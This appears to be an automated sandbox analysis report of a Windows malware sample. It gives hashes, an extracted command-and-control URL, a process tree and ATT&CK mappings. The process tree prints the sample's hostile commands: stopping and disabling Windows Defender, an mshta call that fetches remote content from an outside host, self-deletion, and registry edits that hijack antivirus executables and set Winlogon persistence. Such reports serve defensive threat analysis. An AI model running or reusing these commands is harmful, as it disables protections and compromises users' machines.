Analysis
-
max time kernel
150s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 09:23
Static task
static1
Behavioral task
behavioral1
Sample
f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
-
Size
2.5MB
-
MD5
f5b25ec260db4901e88d2793b5e34998
-
SHA1
05e5794bffc36694bb39750652fd84dc7e3146e6
-
SHA256
6edffe88fcc7936cd27cb9016ca25739aabd148e40cb44eeff8c53975f3144af
-
SHA512
5b6331493a142bbeb2c477a007c7275be20fbdc9af3413a508e84ceb8c2c4a6e34be30ce6dfddf2dbfd6cfd187e4a67823c687923f7d36a500c5f56baba04bec
-
SSDEEP
49152:8nEdi2AHYTFxTal3sQ7VoqvZgpIgpilI3gXWs0SoyN+Y+RC5Hwen/aGLYAzpkbyh:z44pxTal3sQ5raXS1c2Fv/ZLYAzpXh
Malware Config
Extracted
http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=KHBTHJFA&2=i-s&3=176&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\cxsgrd.exe" cxsgrd.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe cxsgrd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" cxsgrd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" cxsgrd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe cxsgrd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe cxsgrd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" cxsgrd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" cxsgrd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" cxsgrd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" cxsgrd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe cxsgrd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe cxsgrd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe cxsgrd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" cxsgrd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe cxsgrd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe cxsgrd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" cxsgrd.exe -
Deletes itself 1 IoCs
pid Process 2940 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2952 cxsgrd.exe -
Loads dropped DLL 2 IoCs
pid Process 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2800 sc.exe 2340 sc.exe 2624 sc.exe 2616 sc.exe 3024 sc.exe 2928 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cxsgrd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2952 cxsgrd.exe Token: SeShutdownPrivilege 2952 cxsgrd.exe Token: SeDebugPrivilege 2952 cxsgrd.exe Token: SeShutdownPrivilege 2952 cxsgrd.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe 2952 cxsgrd.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2952 cxsgrd.exe 2952 cxsgrd.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2936 wrote to memory of 2928 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 30 PID 2936 wrote to memory of 2928 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 30 PID 2936 wrote to memory of 2928 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 30 PID 2936 wrote to memory of 2928 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 30 PID 2936 wrote to memory of 2800 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 31 PID 2936 wrote to memory of 2800 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 31 PID 2936 wrote to memory of 2800 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 31 PID 2936 wrote to memory of 2800 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 31 PID 2936 wrote to memory of 2436 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 33 PID 2936 wrote to memory of 2436 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 33 PID 2936 wrote to memory of 2436 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 33 PID 2936 wrote to memory of 2436 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 33 PID 2936 wrote to memory of 2340 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 34 PID 2936 wrote to memory of 2340 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 34 PID 2936 wrote to memory of 2340 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 34 PID 2936 wrote to memory of 2340 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 34 PID 2936 wrote to memory of 2952 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 38 PID 2936 wrote to memory of 2952 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 38 PID 2936 wrote to memory of 2952 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 38 PID 2936 wrote to memory of 2952 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 38 PID 2936 wrote to memory of 2940 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 39 PID 2936 wrote to memory of 2940 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 39 PID 2936 wrote to memory of 2940 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 39 PID 2936 wrote to memory of 2940 2936 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 39 PID 2436 wrote to memory of 2900 2436 net.exe 40 PID 2436 wrote to memory of 2900 2436 net.exe 40 PID 2436 wrote to memory of 2900 2436 net.exe 40 PID 2436 wrote to memory of 2900 2436 net.exe 40 PID 2952 wrote to memory of 2616 2952 cxsgrd.exe 42 PID 2952 wrote to memory of 2616 2952 cxsgrd.exe 42 PID 2952 wrote to memory of 2616 2952 cxsgrd.exe 42 PID 2952 wrote to memory of 2616 2952 cxsgrd.exe 42 PID 2952 wrote to memory of 2624 2952 cxsgrd.exe 43 PID 2952 wrote to memory of 2624 2952 cxsgrd.exe 43 PID 2952 wrote to memory of 2624 2952 cxsgrd.exe 43 PID 2952 wrote to memory of 2624 2952 cxsgrd.exe 43 PID 2952 wrote to memory of 2668 2952 cxsgrd.exe 45 PID 2952 wrote to memory of 2668 2952 cxsgrd.exe 45 PID 2952 wrote to memory of 2668 2952 cxsgrd.exe 45 PID 2952 wrote to memory of 2668 2952 cxsgrd.exe 45 PID 2952 wrote to memory of 3024 2952 cxsgrd.exe 47 PID 2952 wrote to memory of 3024 2952 cxsgrd.exe 47 PID 2952 wrote to memory of 3024 2952 cxsgrd.exe 47 PID 2952 wrote to memory of 3024 2952 cxsgrd.exe 47 PID 2668 wrote to memory of 1240 2668 net.exe 50 PID 2668 wrote to memory of 1240 2668 net.exe 50 PID 2668 wrote to memory of 1240 2668 net.exe 50 PID 2668 wrote to memory of 1240 2668 net.exe 50 PID 2952 wrote to memory of 1716 2952 cxsgrd.exe 51 PID 2952 wrote to memory of 1716 2952 cxsgrd.exe 51 PID 2952 wrote to memory of 1716 2952 cxsgrd.exe 51 PID 2952 wrote to memory of 1716 2952 cxsgrd.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2928
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:2900
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2340
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\cxsgrd.exeC:\Users\Admin\AppData\Roaming\Microsoft\cxsgrd.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2616
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2624
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:1240
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3024
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=KHBTHJFA&2=i-s&3=176&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\F5B25E~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2940
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Impair Defenses
1Indicator Removal
1File Deletion
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD5f5b25ec260db4901e88d2793b5e34998
SHA105e5794bffc36694bb39750652fd84dc7e3146e6
SHA2566edffe88fcc7936cd27cb9016ca25739aabd148e40cb44eeff8c53975f3144af
SHA5125b6331493a142bbeb2c477a007c7275be20fbdc9af3413a508e84ceb8c2c4a6e34be30ce6dfddf2dbfd6cfd187e4a67823c687923f7d36a500c5f56baba04bec